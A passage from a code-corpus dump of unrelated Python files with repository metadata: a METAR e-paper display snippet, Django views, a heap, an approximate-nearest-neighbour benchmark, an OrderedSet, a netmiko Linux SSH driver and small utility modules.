debug('Write raw METAR text to e-paper display')
line_pos = 40
msg = observation.get('raw_text')
w, h = FONT.getsize(msg)
for line in textwrap.wrap(msg, width=34):
draw.text((0, line_pos), line, font=FONT)
line_pos += h + 3
debug('Flush buffered image to e-paper display')
epd.display(epd.getbuffer(image))
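A small standalone illustration of the line-wrapping logic used above (hypothetical METAR string; a fixed line height stands in for the font metrics):

import textwrap

raw = 'KPIT 201955Z 22015G25KT 3/4SM R28L/2600FT TSRA OVC010CB 18/16 A2992'
line_pos, line_height = 40, 13
for line in textwrap.wrap(raw, width=34):
    print(f'y={line_pos}: {line}')
    line_pos += line_height + 3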
avg_line_length: 38.116279 | max_line_length: 106 | alphanum_fraction: 0.701647 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 2,588 | score_decorators: 0.789506 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,015 | score_documentation: 0.30964
hexsha: 3c4462f1e63b1c59a4923c8fbfbe9795c85ccd1c | size: 3,234 | ext: py | lang: Python
repo_path: electionleaflets/apps/leaflets/views.py | repo_name: electionleaflets/electionleaflets | head_hexsha: 4110e96a3035c32d0b6ff3c9f832c5e003728170 | licenses: ["MIT"] (identical for max_stars, max_issues and max_forks)
max_stars_count: null | max_issues_count: 23 (2015-02-19T14:02:23.000Z to 2015-04-30T11:14:01.000Z) | max_forks_count: 2 (2015-02-02T19:39:54.000Z to 2017-02-08T09:19:53.000Z)
content:
import os
from django.template import RequestContext
from django.shortcuts import render_to_response, get_object_or_404, redirect
from django.contrib.formtools.wizard.views import NamedUrlSessionWizardView
from django.core.urlresolvers import reverse
from django.conf import settings
from django.views.generic import DetailView, ListView
from django.core.files.storage import FileSystemStorage
from .models import Leaflet, LeafletImage
class ImageView(DetailView):
model = LeafletImage
template_name = 'leaflets/full.html'
pk_url_kwarg = 'image_key'
# def view_full_image(request, image_key):
#
# li = LeafletImage.objects.filter(pk=image_key)
# if li.count() == 1:
# li = get_object_or_404(LeafletImage, image_key=image_key)
# else:
# # Should not do this, we'll need to fix it
# # probably and upload artifact
# li = li.all()[0]
#
# return render_to_response('leaflets/full.html',
# {
# 'image': li,
# 'leaflet': li.leaflet,
# },
# context_instance=RequestContext(request), )
def view_all_full_images(request, leafletid):
from leaflets.models import Leaflet, LeafletImage
leaflet = get_object_or_404(Leaflet, pk=leafletid)
images = LeafletImage.objects.filter(leaflet=leaflet)
return render_to_response('leaflets/full_all.html',
{
'images': images,
'leaflet': leaflet,
},
context_instance=RequestContext(request), )
class LatestLeaflets(ListView):
model = Leaflet
template_name = 'leaflets/index.html'
paginate_by = 60
class LeafletView(DetailView):
template_name = 'leaflets/leaflet.html'
queryset = Leaflet.objects.all()
class LeafletUploadWizzard(NamedUrlSessionWizardView):
TEMPLATES = {
"front": "leaflets/upload_form/image_form.html",
"postcode": "leaflets/upload_form/postcode.html",
"cc": "checkout/creditcard.html",
"confirmation": "checkout/confirmation.html",
}
# template_name = "leaflets/upload_form/image_form.html"
file_storage = FileSystemStorage(location=os.path.join(
settings.MEDIA_ROOT, 'images/leaflets_tmp'))
def get_template_names(self):
return [self.TEMPLATES[self.steps.current]]
# def render_next_step(self, form, **kwargs):
# data = get_cleaned_data('2') # or whatever your step with the
# flag is
# if data.get('your_flag', False):
# self.storage.reset()
# return HttpResponseRedirect()
# return super(Wizard, self).render_next_step(self, form, **kwargs)
def done(self, form_list, **kwargs):
#Create a new leaflet
leaflet = Leaflet()
leaflet.save()
# Front
front_image = LeafletImage(leaflet=leaflet, image_type="1_front")
front_image.image = form_list[0].cleaned_data['image']
front_image.save()
return redirect(reverse('leaflet', kwargs={'pk': leaflet.pk}))
avg_line_length: 33.6875 | max_line_length: 79 | alphanum_fraction: 0.629252 | count_classes: 1,638 | score_classes: 0.506494 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,341 | score_documentation: 0.414657
hexsha: 3c44954b74ac962e577c29775c64025c256cc805 | size: 3,409 | ext: py | lang: Python
repo_path: Heap/heap.py | repo_name: jeremy2918/data-structures | head_hexsha: 17685212aac38979929ca923eb2f9b989c74d07a | licenses: ["MIT"] (identical for max_stars, max_issues and max_forks)
max_stars_count: 1 (2021-12-14T19:57:28.000Z to 2021-12-14T19:57:28.000Z) | max_issues_count: null | max_forks_count: null
content:
# Min Heap Implementation
class Heap():
def __init__(self, initial_data=[]):
self.data = []
if isinstance(initial_data, int):
self.data = [initial_data]
elif isinstance(initial_data, list):
self.data = list(initial_data)
    # Returns the number of elements in the heap
def size(self):
return len(self.data)
# Add an element to the min heap
def add(self, elem):
self.data.append(elem)
self.swim(len(self.data) - 1)
# Removes and return the element with the highest priority (first element)
def poll(self):
if self.is_empty():
raise Exception("Min heap is empty")
polled = self.data[0]
self.remove(polled)
return polled
    # Removes an element from the heap
def remove(self, elem):
if self.is_empty():
raise Exception("Min heap is empty")
index = self.index(elem)
if index == -1:
raise Exception(f"Heap does not contain the element <{elem}>")
self.swap(index, self.size() - 1)
self.data.pop()
# If the element was the last one, do nothing else
if index == self.size():
return
if not self.is_empty():
self.sink(index)
self.swim(index)
# Bubble up an element at a k position
def swim(self, k):
parent = (k - 1) // 2
# Keep swimming while we have not reached the
# root and while we're less than our parent.
while k > 0 and self.data[k] < self.data[parent]:
self.swap(k, parent)
k = parent
parent = (k - 1) // 2
# Bubble down an element at a k position
def sink(self, k):
while True:
left = 2 * k + 1
right = 2 * k + 2
smallest = left
# Take the left children as smallest by default
# Change only if right children is less than left children
if right < self.size() and self.data[right] < self.data[left]:
smallest = right
            # Keep swapping while k is less than parent and
# we are not at the last position of the heap
if left >= self.size() or self.data[k] < self.data[smallest]:
break
self.swap(k, smallest)
k = smallest
# Swaps the positions of two elements given their indexes
def swap(self, i1, i2):
elem1 = self.data[i1]
elem2 = self.data[i2]
self.data[i1] = elem2
self.data[i2] = elem1
# Returns whether the heap is empty
def is_empty(self):
return self.size() == 0
# Returns the first element (smallest) of the heap
def peek(self):
return self.data[0] if not self.is_empty() else None
# Returns the index of an element in the heap, -1 if it is not contained
def index(self, elem):
for index, value in enumerate(self.data):
if value == elem:
return index
return -1
# Whether an element in contained in the heap
def contains(self, elem):
return self.index(elem) != -1
    # Representation method
def __repr__(self):
return f"Heap({repr(self.data)})"
# Convert to string method
def __str__(self):
return str(self.data)
    # Length of the heap
def __len__(self):
return len(self.data)
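A short usage sketch of the min-heap above (hypothetical values):

h = Heap()
for value in (5, 3, 8, 1):
    h.add(value)
print(h.peek())       # 1
print(h.poll())       # 1
print(h.poll())       # 3
print(h.contains(8))  # True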
avg_line_length: 29.387931 | max_line_length: 78 | alphanum_fraction: 0.566442 | count_classes: 3,381 | score_classes: 0.991786 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,058 | score_documentation: 0.310355
hexsha: 3c460fdfda615228be90ea72ed8b2f5c151649c7 | size: 16,921 | ext: py | lang: Python
repo_path: benchmarks/benchmark_script.py | repo_name: oddconcepts/n2o | head_hexsha: fe6214dcc06a1b13be60733c53ac25bca3c2b4d0 | licenses: ["Apache-2.0"] (identical for max_stars, max_issues and max_forks)
max_stars_count: 2 (2019-02-13T12:59:27.000Z to 2020-01-28T02:02:47.000Z) | max_issues_count: 2 (2019-06-25T10:00:57.000Z to 2019-10-26T14:55:23.000Z) | max_forks_count: 1 (2021-11-03T14:59:27.000Z to 2021-11-03T14:59:27.000Z)
content:
# This code is based on the code
# from ann-benchmark repository
# created by Erik Bernhardsson
# https://github.com/erikbern/ann-benchmarks
import gzip
import numpy
import time
import os
import multiprocessing
import argparse
import pickle
import resource
import random
import math
import logging
import shutil
import subprocess
import sys
import tarfile
from contextlib import closing
try:
xrange
except NameError:
xrange = range
try:
from urllib2 import urlopen
except ImportError:
from urllib.request import urlopen
from n2 import HnswIndex
n2_logger = logging.getLogger("n2_benchmark")
n2_logger.setLevel(logging.INFO)
# Set resource limits to prevent memory bombs
memory_limit = 12 * 2**30
soft, hard = resource.getrlimit(resource.RLIMIT_DATA)
if soft == resource.RLIM_INFINITY or soft >= memory_limit:
n2_logger.info('resetting memory limit from {0} to {1}. '.format(soft, memory_limit))
resource.setrlimit(resource.RLIMIT_DATA, (memory_limit, hard))
INDEX_DIR='indices'
DATA_DIR = './datasets/'
GLOVE_DIR = DATA_DIR + 'glove.txt'
SIFT_DIR = DATA_DIR + 'sift.txt'
YOUTUBE_DIR = DATA_DIR + 'youtube.txt'
class BaseANN(object):
def use_threads(self):
return True
class BruteForceBLAS(BaseANN):
"""kNN search that uses a linear scan = brute force."""
def __init__(self, metric, precision=numpy.float32):
if metric not in ('angular', 'euclidean'):
raise NotImplementedError("BruteForceBLAS doesn't support metric %s" % metric)
self._metric = metric
self._precision = precision
self.name = 'BruteForceBLAS()'
def fit(self, X):
"""Initialize the search index."""
lens = (X ** 2).sum(-1) # precompute (squared) length of each vector
if self._metric == 'angular':
X /= numpy.sqrt(lens)[..., numpy.newaxis] # normalize index vectors to unit length
self.index = numpy.ascontiguousarray(X, dtype=self._precision)
elif self._metric == 'euclidean':
self.index = numpy.ascontiguousarray(X, dtype=self._precision)
self.lengths = numpy.ascontiguousarray(lens, dtype=self._precision)
else:
assert False, "invalid metric" # shouldn't get past the constructor!
def query(self, v, n):
"""Find indices of `n` most similar vectors from the index to query vector `v`."""
v = numpy.ascontiguousarray(v, dtype=self._precision) # use same precision for query as for index
# HACK we ignore query length as that's a constant not affecting the final ordering
if self._metric == 'angular':
# argmax_a cossim(a, b) = argmax_a dot(a, b) / |a||b| = argmin_a -dot(a, b)
dists = -numpy.dot(self.index, v)
elif self._metric == 'euclidean':
# argmin_a (a - b)^2 = argmin_a a^2 - 2ab + b^2 = argmin_a a^2 - 2ab
dists = self.lengths - 2 * numpy.dot(self.index, v)
else:
assert False, "invalid metric" # shouldn't get past the constructor!
indices = numpy.argpartition(dists, n)[:n] # partition-sort by distance, get `n` closest
return sorted(indices, key=lambda index: dists[index]) # sort `n` closest into correct order
class N2(BaseANN):
def __init__(self, m, ef_construction, n_threads, ef_search, metric):
self._m = m
self._m0 = m * 2
self._ef_construction = ef_construction
self._n_threads = n_threads
self._ef_search = ef_search
self._index_name = os.path.join(INDEX_DIR, "n2_%s_M%d_efCon%d_n_thread%s_data_size%d" % (args.dataset, m, ef_construction, n_threads, max(args.data_size, 0)))
self.name = "N2_M%d_efCon%d_n_thread%s_efSearch%d" % (m, ef_construction, n_threads, ef_search)
self._metric = metric
d = os.path.dirname(self._index_name)
if not os.path.exists(d):
os.makedirs(d)
def fit(self, X):
if self._metric == 'euclidean':
self._n2 = HnswIndex(X.shape[1], 'L2')
else:
self._n2 = HnswIndex(X.shape[1])
if os.path.exists(self._index_name):
n2_logger.info("Loading index from file")
self._n2.load(self._index_name)
else:
            n2_logger.info("Index file does not exist: {0}".format(self._index_name))
n2_logger.info("Start fitting")
for i, x in enumerate(X):
self._n2.add_data(x.tolist())
self._n2.build(m=self._m, max_m0=self._m0, ef_construction=self._ef_construction, n_threads=self._n_threads)
self._n2.save(self._index_name)
def query(self, v, n):
return self._n2.search_by_vector(v.tolist(), n, self._ef_search)
def __str__(self):
return self.name
class NmslibReuseIndex(BaseANN):
    def __init__(self, metric, method_name, index_param, save_index, query_param):
self._nmslib_metric = {
'angular': 'cosinesimil',
'euclidean': 'l2'}[metric]
self._method_name = method_name
self._save_index = save_index
self._index_param = index_param
self._query_param = query_param
self.name = 'Nmslib(method_name=%s, index_param=%s, query_param=%s)' % (
method_name, index_param, query_param)
self._index_name = os.path.join(
INDEX_DIR, "youtube_nmslib_%s_%s_%s_data_size_%d" %
(self._method_name, metric, '_'.join(
self._index_param), max(args.data_size, 0)))
d = os.path.dirname(self._index_name)
if not os.path.exists(d):
os.makedirs(d)
def fit(self, X):
import nmslib
self._index = nmslib.init(
self._nmslib_metric,
[],
self._method_name,
nmslib.DataType.DENSE_VECTOR,
nmslib.DistType.FLOAT)
for i, x in enumerate(X):
nmslib.addDataPoint(self._index, i, x.tolist())
if os.path.exists(self._index_name):
logging.debug("Loading index from file")
nmslib.loadIndex(self._index, self._index_name)
else:
logging.debug("Create Index")
nmslib.createIndex(self._index, self._index_param)
if self._save_index:
nmslib.saveIndex(self._index, self._index_name)
nmslib.setQueryTimeParams(self._index, self._query_param)
def query(self, v, n):
import nmslib
return nmslib.knnQuery(self._index, n, v.tolist())
def freeIndex(self):
import nmslib
nmslib.freeIndex(self._index)
class Annoy(BaseANN):
def __init__(self, metric, n_trees, search_k):
self._n_trees = n_trees
self._search_k = search_k
self._metric = metric
self._index_name = os.path.join(
INDEX_DIR, "youtube_annoy_%s_tree%d_data_size_%d" %
(metric, n_trees, max(args.data_size, 0)))
self.name = 'Annoy(n_trees=%d, search_k=%d)' % (n_trees, search_k)
d = os.path.dirname(self._index_name)
if not os.path.exists(d):
os.makedirs(d)
def fit(self, X):
import annoy
self._annoy = annoy.AnnoyIndex(f=X.shape[1], metric=self._metric)
if os.path.exists(self._index_name):
logging.debug("Loading index from file")
self._annoy.load(self._index_name)
else:
            logging.debug("Index file does not exist, start fitting")
for i, x in enumerate(X):
self._annoy.add_item(i, x.tolist())
self._annoy.build(self._n_trees)
self._annoy.save(self._index_name)
def query(self, v, n):
return self._annoy.get_nns_by_vector(v.tolist(), n, self._search_k)
def run_algo(args, library, algo, results_fn):
pool = multiprocessing.Pool()
X_train, X_test = get_dataset(which=args.dataset, data_size=args.data_size, test_size=args.test_size, random_state = args.random_state)
pool.close()
pool.join()
t0 = time.time()
algo.fit(X_train)
build_time = time.time() - t0
n2_logger.info('Built index in {0}'.format(build_time))
best_search_time = float('inf')
best_precision = 0.0 # should be deterministic but paranoid
try_count = args.try_count
for i in xrange(try_count): # Do multiple times to warm up page cache, use fastest
results = []
search_time = 0.0
current_query = 1
total_queries = len(queries)
for j in range(total_queries):
v, correct = queries[j]
sys.stdout.write("Querying: %d / %d \r" % (current_query, total_queries))
t0 = time.time()
found = algo.query(v, GT_SIZE)
search_time += (time.time() - t0)
if len(found) < len(correct):
n2_logger.info('found: {0}, correct: {1}'.format(len(found), len(correct)))
current_query += 1
results.append(len(set(found).intersection(correct)))
k = float(sum(results))
search_time /= len(queries)
precision = k / (len(queries) * GT_SIZE)
best_search_time = min(best_search_time, search_time)
best_precision = max(best_precision, precision)
sys.stdout.write('*[%d/%d][algo: %s] search time: %s, precision: %.5f \r' % (i+1, try_count, str(algo), str(search_time), precision))
sys.stdout.write('\n')
output = [library, algo.name, build_time, best_search_time, best_precision]
n2_logger.info(str(output))
f = open(results_fn, 'a')
f.write('\t'.join(map(str, output)) + '\n')
f.close()
n2_logger.info('Summary: {0}'.format('\t'.join(map(str, output))))
def get_dataset(which='glove', data_size=-1, test_size = 10000, random_state = 3):
cache = 'queries/%s-%d-%d-%d.npz' % (which, max(args.data_size, 0), test_size, random_state)
if os.path.exists(cache):
v = numpy.load(cache)
X_train = v['train']
X_test = v['test']
n2_logger.info('{0} {1}'.format(X_train.shape, X_test.shape))
return X_train, X_test
local_fn = os.path.join('datasets', which)
if os.path.exists(local_fn + '.gz'):
f = gzip.open(local_fn + '.gz')
else:
f = open(local_fn + '.txt')
X = []
for i, line in enumerate(f):
v = [float(x) for x in line.strip().split()]
X.append(v)
if data_size != -1 and len(X) == data_size:
break
X = numpy.vstack(X)
import sklearn.cross_validation
# Here Erik is most welcome to use any other random_state
# However, it is best to use a new random seed for each major re-evaluation,
    # so that we test on truly blind data.
X_train, X_test = sklearn.cross_validation.train_test_split(X, test_size=test_size, random_state=random_state)
X_train = X_train.astype(numpy.float)
X_test = X_test.astype(numpy.float)
numpy.savez(cache, train=X_train, test=X_test)
return X_train, X_test
def get_queries(args):
n2_logger.info('computing queries with correct results...')
bf = BruteForceBLAS(args.distance)
X_train, X_test = get_dataset(which=args.dataset, data_size=args.data_size, test_size=args.test_size, random_state=args.random_state)
# Prepare queries
bf.fit(X_train)
queries = []
total_queries = len(X_test)
for x in X_test:
correct = bf.query(x, GT_SIZE)
queries.append((x, correct))
sys.stdout.write('computing queries %d/%d ...\r' % (len(queries), total_queries))
sys.stdout.write('\n')
return queries
def get_fn(base, args):
fn = os.path.join(base, args.dataset)
if args.data_size != -1:
fn += '-%d' % args.data_size
if args.test_size != -1:
fn += '-%d' % args.test_size
fn += '-%d' % args.random_state
if os.path.exists(fn + '.gz'):
fn += '.gz'
else:
fn += '.txt'
d = os.path.dirname(fn)
if not os.path.exists(d):
os.makedirs(d)
return fn
def download_file(url, dst):
file_name = url.split('/')[-1]
with closing(urlopen(url)) as res:
with open(dst+"/"+file_name, 'wb') as f:
file_size = int(res.headers["Content-Length"])
sys.stdout.write("Downloading datasets %s\r" % (file_name))
file_size_dl = 0
block_sz = 10240
while True:
buffer = res.read(block_sz)
if not buffer:
break
file_size_dl += len(buffer)
f.write(buffer)
sys.stdout.write("Downloading datasets %s: %d / %d bytes\r" % (file_name, file_size_dl, file_size))
sys.stdout.write('\n')
if __name__ == '__main__':
global GT_SIZE
parser = argparse.ArgumentParser()
parser.add_argument('--distance', help='Distance metric', default='angular')
parser.add_argument('--try_count', help='Number of test attempts', type=int, default=3)
parser.add_argument('--dataset', help='Which dataset', default='glove')
parser.add_argument('--data_size', help='Maximum # of data points', type=int, default=-1)
parser.add_argument('--test_size', help='Maximum # of data queries', type=int, default=10000)
parser.add_argument('--n_threads', help='Number of threads', type=int, default=10)
parser.add_argument('--random_state', help='Random seed', type=int, default=3)
parser.add_argument('--algo', help='Algorithm', type=str)
args = parser.parse_args()
if not os.path.exists(DATA_DIR):
os.makedirs(DATA_DIR)
numpy.random.seed(args.random_state)
if args.dataset == 'glove':
GT_SIZE = 10
elif args.dataset == 'sift':
GT_SIZE = 10
elif args.dataset == 'youtube':
GT_SIZE = 100
else:
print('Invalid dataset: {}'.format(args.dataset))
exit(0)
print('* GT size: {}'.format(GT_SIZE))
if args.dataset == 'glove' and not os.path.exists(GLOVE_DIR):
download_file("https://s3-us-west-1.amazonaws.com/annoy-vectors/glove.twitter.27B.100d.txt.gz", "datasets")
with gzip.open('datasets/glove.twitter.27B.100d.txt.gz', 'rb') as f_in, open('datasets/glove.twitter.27B.100d.txt', 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
subprocess.call("cut -d \" \" -f 2- datasets/glove.twitter.27B.100d.txt > datasets/glove.txt", shell=True)
if args.dataset == 'sift' and not os.path.exists(SIFT_DIR):
download_file("ftp://ftp.irisa.fr/local/texmex/corpus/sift.tar.gz", "datasets")
with tarfile.open("datasets/sift.tar.gz") as t:
t.extractall(path="datasets")
subprocess.call("python datasets/convert_texmex_fvec.py datasets/sift/sift_base.fvecs >> datasets/sift.txt", shell=True)
if args.dataset == 'youtube' and not os.path.exists(YOUTUBE_DIR):
raise IOError('Please follow the instructions in the guide to download the YouTube dataset.')
results_fn = get_fn('results', args)
queries_fn = get_fn('queries', args)
logging.info('storing queries in {0} and results in {1}.'.format(queries_fn, results_fn))
if not os.path.exists(queries_fn):
queries = get_queries(args)
with open(queries_fn, 'wb') as f:
pickle.dump(queries, f)
else:
queries = pickle.load(open(queries_fn, 'rb'))
logging.info('got {0} queries'.format(len(queries)))
algos = {
'annoy': [ Annoy('angular', n_trees, search_k)
for n_trees in [10, 50, 100]
for search_k in [ 7, 3000, 50000, 200000, 500000]
],
'n2': [ N2(M, ef_con, args.n_threads, ef_search, 'angular')
for M, ef_con in [ (12, 100)]
for ef_search in [1, 10, 25, 50, 100, 250, 500, 750, 1000, 1500, 2500, 5000, 10000, 100000]
],
'nmslib': []}
MsPostsEfs = [
({'M': 12,
'post': 0,
'indexThreadQty': args.n_threads,
'delaunay_type': 2,
'efConstruction': 100,
},
[1, 10, 25, 50, 100, 250, 500, 750, 1000, 1500, 2000, 2500],
),
]
for oneCase in MsPostsEfs:
for ef in oneCase[1]:
params = ['%s=%s' % (k, str(v)) for k, v in oneCase[0].items()]
algos['nmslib'].append(
NmslibReuseIndex( 'angular', 'hnsw', params, True, ['ef=%d' % ef]))
algos_flat = []
if args.algo:
print('running only: %s' % str(args.algo))
algos = {args.algo: algos[args.algo]}
for library in algos.keys():
for algo in algos[library]:
algos_flat.append((library, algo))
random.shuffle(algos_flat)
logging.debug('order: %s' % str([a.name for l, a in algos_flat]))
for library, algo in algos_flat:
logging.info(algo.name)
# Spawn a subprocess to force the memory to be reclaimed at the end
p = multiprocessing.Process(target=run_algo, args=(args, library, algo, results_fn))
p.start()
p.join()
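A minimal end-to-end sketch of the n2 HnswIndex calls that the N2 wrapper above relies on (hypothetical random data; mirrors only the API used in this file):

import numpy
from n2 import HnswIndex

data = numpy.random.rand(1000, 100).astype(numpy.float32)
index = HnswIndex(data.shape[1])          # angular space by default, as in N2.fit
for row in data:
    index.add_data(row.tolist())
index.build(m=12, max_m0=24, ef_construction=100, n_threads=4)
print(index.search_by_vector(data[0].tolist(), 10, 100))  # 10 neighbours, ef_search=100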
avg_line_length: 37.602222 | max_line_length: 166 | alphanum_fraction: 0.61929 | count_classes: 6,555 | score_classes: 0.387388 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 3,517 | score_documentation: 0.207848
hexsha: 3c48c2125ebec3cfbc2f8abe3432087a8f247884 | size: 28 | ext: py | lang: Python
repo_path: ars/__init__.py | repo_name: david-lindner/ARS | head_hexsha: acfe403ebe90c157d61690a9498597244853fc78 | licenses: ["BSD-2-Clause"] (identical for max_stars, max_issues and max_forks)
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
from .ars import ARSLearner
avg_line_length: 14 | max_line_length: 27 | alphanum_fraction: 0.821429 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 0 | score_documentation: 0
hexsha: 3c4c370cfd780bfee437676b79c4d199589eb48b | size: 618 | ext: py | lang: Python
repo_path: setup.py | repo_name: elaru/python3-cre | head_hexsha: 84863b5acaab5f903a3d3b2a1b6a2cb10ed00679 | licenses: ["0BSD"] (identical for max_stars, max_issues and max_forks)
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
from setuptools import setup
setup(
name="cre",
packages=["cre"],
version="0.1.0",
author="Philipp Schiffmann",
author_email="philippschiffmann@icloud.com",
url="https://github.com/elaru/python3-cre",
description="A regular expression processor implemented in python.",
license="ISC",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: ISC License (ISCL)",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3"
]
)
avg_line_length: 28.090909 | max_line_length: 69 | alphanum_fraction: 0.676375 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 424 | score_documentation: 0.686084
hexsha: 3c4ce0be200904020cc2f4b6271e9daccb20ccb2 | size: 284 | ext: py | lang: Python
repo_path: bin/const.py | repo_name: Novartole/Video-pixels | head_hexsha: 10246d1953289e1cded43ed63104f5343a3d9e65 | licenses: ["MIT"] (identical for max_stars, max_issues and max_forks)
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
import enum
DEFAULT_FILE_NAME = 'DEFAULT'
RANDOM_MIX_CONFIG_NAME = 'RandomMix'
WIDTH_NAME = 'Width'
HIGHT_NAME = 'Hight'
class AutoName(enum.Enum):
def _generate_next_value_(name, start, count, last_values):
return name
class Algorithms(AutoName):
RANDOM_MIX = enum.auto()
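A tiny illustration of the AutoName pattern above: enum.auto() passes the member name to _generate_next_value_, so each member's value equals its name.

print(Algorithms.RANDOM_MIX.value)                        # 'RANDOM_MIX'
print(Algorithms('RANDOM_MIX') is Algorithms.RANDOM_MIX)  # True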
avg_line_length: 20.285714 | max_line_length: 61 | alphanum_fraction: 0.760563 | count_classes: 158 | score_classes: 0.556338 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 34 | score_documentation: 0.119718
hexsha: 3c4dca815ed01033d3b7eadeef2709708a553018 | size: 1,902 | ext: py | lang: Python
repo_path: src/nr/util/orderedset.py | repo_name: NiklasRosenstein/python-nr.util | head_hexsha: 087f2410d38006c1005a5fb330c47a56bcdb2279 | licenses: ["MIT"] (identical for max_stars, max_issues and max_forks)
max_stars_count: null | max_issues_count: 3 (2022-02-16T13:17:28.000Z to 2022-03-14T15:28:41.000Z) | max_forks_count: null
content:
import collections
import functools
import typing as t
from nr.util.generic import T
T_OrderedSet = t.TypeVar('T_OrderedSet', bound='OrderedSet')
@functools.total_ordering
class OrderedSet(t.MutableSet[T]):
def __init__(self, iterable: t.Optional[t.Iterable[T]] = None) -> None:
self._index_map: t.Dict[T, int] = {}
self._content: t.Deque[T] = collections.deque()
if iterable is not None:
self.update(iterable)
def __repr__(self) -> str:
if not self._content:
return '%s()' % (type(self).__name__,)
return '%s(%r)' % (type(self).__name__, list(self))
def __iter__(self) -> t.Iterator[T]:
return iter(self._content)
def __reversed__(self) -> 'OrderedSet[T]':
return OrderedSet(reversed(self._content))
def __eq__(self, other: t.Any) -> bool:
if isinstance(other, OrderedSet):
return len(self) == len(other) and list(self) == list(other)
return False
def __le__(self, other: t.Any) -> bool:
return all(e in other for e in self)
def __len__(self) -> int:
return len(self._content)
def __contains__(self, key: t.Any) -> bool:
return key in self._index_map
def __getitem__(self, index: int) -> T:
return self._content[index]
def add(self, key: T) -> None:
if key not in self._index_map:
self._index_map[key] = len(self._content)
self._content.append(key)
def copy(self: T_OrderedSet) -> 'T_OrderedSet':
return type(self)(self)
def discard(self, key: T) -> None:
if key in self._index_map:
index = self._index_map.pop(key)
del self._content[index]
def pop(self, last: bool = True) -> T:
if not self._content:
raise KeyError('set is empty')
key = self._content.pop() if last else self._content.popleft()
self._index_map.pop(key)
return key
def update(self, iterable: t.Iterable[T]) -> None:
for x in iterable:
self.add(x)
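A short usage sketch of OrderedSet (hypothetical values):

s = OrderedSet(['b', 'a', 'c', 'a'])
print(list(s))    # ['b', 'a', 'c'], insertion order kept, duplicate ignored
print('a' in s)   # True
print(s.pop())    # 'c', pops from the end by default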
avg_line_length: 26.788732 | max_line_length: 73 | alphanum_fraction: 0.656677 | count_classes: 1,724 | score_classes: 0.906414 | count_generators: 0 | score_generators: 0 | count_decorators: 1,750 | score_decorators: 0.920084 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 83 | score_documentation: 0.043638
hexsha: 3c4ddc1c01b18295d9fb2f58c8e9a33ac6c57830 | size: 1,812 | ext: py | lang: Python
repo_path: applied_python/applied_python/lib/python2.7/site-packages/netmiko/linux/linux_ssh.py | repo_name: mith1979/ansible_automation | head_hexsha: 013dfa67c6d91720b787fadb21de574b6e023a26 | licenses: ["Apache-2.0"] (identical for max_stars, max_issues and max_forks)
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
import re
from netmiko.ssh_connection import SSHConnection
class LinuxSSH(SSHConnection):
def set_base_prompt(self, pri_prompt_terminator='$',
alt_prompt_terminator='#', delay_factor=.1):
"""Determine base prompt."""
return super(SSHConnection, self).set_base_prompt(
pri_prompt_terminator=pri_prompt_terminator,
alt_prompt_terminator=alt_prompt_terminator,
delay_factor=delay_factor)
def send_config_set(self, config_commands=None, exit_config_mode=True, **kwargs):
"""Can't exit from root (if root)"""
if self.username == "root":
exit_config_mode = False
return super(SSHConnection, self).send_config_set(config_commands=config_commands,
exit_config_mode=exit_config_mode,
**kwargs)
def check_config_mode(self, check_string='#'):
"""Verify root"""
return super(SSHConnection, self).check_config_mode(check_string=check_string)
def config_mode(self, config_command='sudo su'):
"""Attempt to become root."""
return self.enable(cmd=config_command)
def exit_config_mode(self, exit_config='exit'):
return super(SSHConnection, self).exit_config_mode(exit_config=exit_config)
def check_enable_mode(self, check_string='#'):
return self.check_config_mode(check_string=check_string)
def exit_enable_mode(self, exit_command='exit'):
return self.exit_config_mode(exit_config=exit_command)
def enable(self, cmd='sudo su', pattern='ssword', re_flags=re.IGNORECASE):
"""Attempt to become root."""
return super(SSHConnection, self).enable(cmd=cmd, pattern=pattern, re_flags=re_flags)
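A minimal usage sketch (hypothetical host and credentials; in netmiko the 'linux' device_type is the usual way to reach this class through ConnectHandler):

from netmiko import ConnectHandler

conn = ConnectHandler(device_type='linux', host='192.0.2.10',
                      username='admin', password='secret')
print(conn.send_command('uname -a'))
conn.disconnect()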
avg_line_length: 42.139535 | max_line_length: 93 | alphanum_fraction: 0.657837 | count_classes: 1,750 | score_classes: 0.965784 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 195 | score_documentation: 0.107616
hexsha: 3c51be6bea74f985c0302d56a6e42f0067e94f0f | size: 4,287 | ext: py | lang: Python
repo_path: K-Cap_2021/2C_associations_by_cluster/build_cluster_hashes.py | repo_name: cultural-ai/ConConCor | head_hexsha: f5c30dfb7d38392f492f9c6e44c8d242f2820ce4 | licenses: ["CC-BY-2.0"] (identical for max_stars, max_issues and max_forks)
max_stars_count: 1 (2021-12-14T10:19:55.000Z to 2021-12-14T10:19:55.000Z) | max_issues_count: null | max_forks_count: null
content:
"""{Build token: cluster index}, hashes for each specified granularity level in the user-defined list 'clustering_levels_to_consider'
Output: level_xx_hash.json hash to /cluster_hashes
"""
import json
import os
import pickle as pkl
import typing
import numpy as np
def main():
#
# user-defined vars
#
clustering_levels_to_consider = [12]
